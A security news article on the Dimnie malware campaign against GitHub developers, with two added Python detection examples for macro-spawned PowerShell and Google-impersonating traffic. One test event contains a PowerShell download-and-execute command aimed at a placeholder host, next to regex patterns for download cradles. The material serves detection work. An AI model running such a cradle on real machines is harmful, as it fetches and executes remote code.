This Sophisticated Malware Attack Targets Open Source Developers

In the past few months, developers who publish their code on GitHub have been targeted in an attack campaign that uses a little-known but potent piece of malware.

The attacks started in January and have consisted of malicious emails specifically crafted to attract developers' attention, such as requests for help with development projects and offers of payment for programming jobs.

The emails carry .gz attachments containing Word documents with malicious macro code. If the macro is allowed to run, it launches a PowerShell script that reaches out to a remote server and downloads a malware program known as Dimnie.
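The macro-to-PowerShell chain described above has a well-known detection signal: an Office application spawning a script host, often with a download cradle and window-hiding flags in the command line. The following is an added example, not code from the article or from Palo Alto Networks, that applies that heuristic to a handful of constructed process-creation events (Sysmon Event ID 1 style; the paths, command lines and the `c2.example.invalid` host are all made up for the example).

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events for the example, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # Word launching PowerShell with a download cradle and hidden window
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://c2.example.invalid/x')\"",
    },
    {  # Benign: a user-launched maintenance script from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1",
    },
    {  # Excel spawning cmd.exe: suspicious parent/child even without a cradle
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c whoami",
    },
    {  # Benign: Word's print helper process
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\splwow64.exe",
        "cmdline": "splwow64.exe 12288",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Strings commonly seen in PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|bitsadmin",
    re.IGNORECASE)
# Flags used to suppress the console window and profile scripts.
HIDDEN_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\b|-encodedcommand",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like macro-launched code.

    An empty list means the event did not match the Office -> script host
    pattern at all.
    """
    reasons: List[str] = []
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"office app {parent} spawned script host {child}")
        if DOWNLOAD_CRADLE.search(event["cmdline"]):
            reasons.append("download cradle in command line")
        if HIDDEN_FLAGS.search(event["cmdline"]):
            reasons.append("hidden window / no-profile flags")
    return reasons


def find_suspicious(events: List[Dict[str, str]]) -> List[Tuple[Dict[str, str], List[str]]]:
    """Pair each matching event with its reasons, dropping non-matching ones."""
    return [(ev, reasons) for ev in events if (reasons := score_event(ev))]


if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(basename(ev["parent"]), "->", basename(ev["image"]), "|", "; ".join(reasons))
```

Only the first and third events are returned: the Explorer-launched script and Word's print helper never match the parent/child pair, so their command lines are not even inspected. In practice the parent/child rule alone is noisy in environments that legitimately script from Office, so the cradle and hidden-flag reasons are what would raise the alert's priority.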

According to researchers from Palo Alto Networks, Dimnie has been around since 2014 and has flown under the radar until now because it was primarily aimed at users in Russia.

The malware uses stealthy techniques to blend its malicious traffic into normal user activity. It generates requests that appear to be directed at Google domain names but are actually sent to an attacker-controlled IP address.
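The blending technique described above leaves a checkable inconsistency: the host name in the request does not belong to the address the connection actually went to. The following is an added example, not code from the article or from Palo Alto Networks, that flags that mismatch over a few constructed proxy-log records. The Google prefixes listed are an illustrative snapshot, not an authoritative list; a production check would compare against the provider's currently published ranges or against what a trusted resolver returned for the name at the time of the request. The `203.0.113.0/24` and `198.51.100.0/24` addresses are documentation ranges used here as stand-ins.

```python
import ipaddress
from typing import Dict, List, Optional

# Constructed proxy-log records for the example, not real traffic.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"dst_ip": "142.250.74.46", "host": "www.google.com", "path": "/"},
    # Host header names a Google domain, but the connection went elsewhere.
    {"dst_ip": "203.0.113.77", "host": "mail.google.com", "path": "/u/0/"},
    {"dst_ip": "198.51.100.9", "host": "updates.example.org", "path": "/check"},
    {"dst_ip": "142.250.74.46", "host": "accounts.google.com", "path": "/login"},
]

# Illustrative snapshot of address space for the monitored brand (assumption:
# refresh this from the provider's published list in real use).
GOOGLE_PREFIXES = [ipaddress.ip_network(p) for p in
                   ("142.250.0.0/15", "172.217.0.0/16", "216.58.192.0/19")]

# Domain suffixes worth checking, mapped to where their traffic should land.
MONITORED_SUFFIXES = {"google.com": GOOGLE_PREFIXES}


def expected_prefixes(host: str) -> Optional[List[ipaddress.IPv4Network]]:
    """Prefixes a request for `host` should terminate in, or None if unmonitored."""
    name = host.lower().rstrip(".")
    for suffix, prefixes in MONITORED_SUFFIXES.items():
        if name == suffix or name.endswith("." + suffix):
            return prefixes
    return None


def host_ip_mismatch(request: Dict[str, str]) -> bool:
    """True when the named host is monitored but the destination IP is outside
    the ranges that host should resolve to."""
    prefixes = expected_prefixes(request["host"])
    if prefixes is None:
        return False  # not a brand we check; nothing to compare against
    ip = ipaddress.ip_address(request["dst_ip"])
    return not any(ip in prefix for prefix in prefixes)


def find_mismatches(requests: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the records whose host name and destination address disagree."""
    return [r for r in requests if host_ip_mismatch(r)]


if __name__ == "__main__":
    for r in find_mismatches(SAMPLE_REQUESTS):
        print(f"host {r['host']} sent to {r['dst_ip']} (outside expected ranges)")
```

Only the second record is flagged. The check is deliberately one-sided: an unmonitored host is never reported, so the allowlist of suffixes controls the false-positive rate, and a monitored host that lands in its expected ranges passes even if the path looks odd. It also says nothing about content, which is why it is a cheap first filter rather than a verdict.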

Dimnie can download additional malicious modules, which are injected directly into the memory of legitimate Windows processes. The modules leave no traces on disk, which makes their analysis and detection harder, Palo Alto researchers said in a blog post.

There are separate modules for screen grabbing, keylogging, interacting with smart cards attached to the computer, and more. There is also a self-destruct module that wipes all files from the system drive to destroy traces of the malware's presence.

Data stolen from an infected computer is encrypted and appended to image headers in an attempt to bypass intrusion prevention systems.

Developers can be valuable targets for cyber espionage: their computers often hold proprietary information and access credentials for their employers' networks and systems.
